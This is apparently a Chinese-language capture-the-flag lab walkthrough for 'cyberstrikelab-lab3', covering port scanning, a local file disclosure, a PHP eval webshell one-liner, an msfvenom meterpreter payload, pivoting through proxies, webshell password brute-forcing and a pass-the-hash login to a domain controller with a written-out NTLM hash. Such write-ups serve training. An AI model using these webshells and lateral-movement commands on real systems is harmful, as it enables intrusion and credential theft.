cyberstrikelab-lab3
web信息收集
端口扫描
nmap -sT -Pn -p- 192.168.10.10 -T4

3590端口开启是一个web应用

扫描出来了一个

访问看看是一个登录框

查看登录界面的网页源码

登录进来看到版本信息

使用万能的搜索引擎

看到这里有一个本地文件泄露漏洞

找到第一个flag

另外还发现能在web目录写入文件,我们写入一句话
<?php @eval($_POST['cmd']);?>

蚁剑连接

msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe

内网渗透
上线msf

直接就是系统权限

查找fscan
find / -name "fscan.exe" 2>/dev/null

利用meterpreter模块上传
upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe

看到有双网卡

fscan扫描另一张网卡,发现192.168.20.20和192.168.20.30靶机,其中30是域控主机

使用fscan扫描第一台机器的端口

添加路由
run post/multi/manage/autoroute
配置代理
use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run -j

修改代理
vi /etc/proxychains4.conf

访问到thinkphp站

从flag中可以看到木马在主页

使用awBruter密码爆破工具,爆破出来密码是admin123

蚁剑设置好代理

使用密码连接

找到第二个flag

拿下系统权限

域渗透
之后就可以上传msf马,如果蚁剑不行的话(这个环境可能有一点问题,第二台机器老是断网)那就使用windows的远程连接上传到10.10,然后再利用windows自带的远程连接传20.20机器(前提是创建了一个远程连接用户),往期很多文章都写过,之后利用msf抓取hash或者使用猕猴桃抓取哈希,使用hash传递攻击
proxychains impacket-psexec -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30

THE END
















暂无评论内容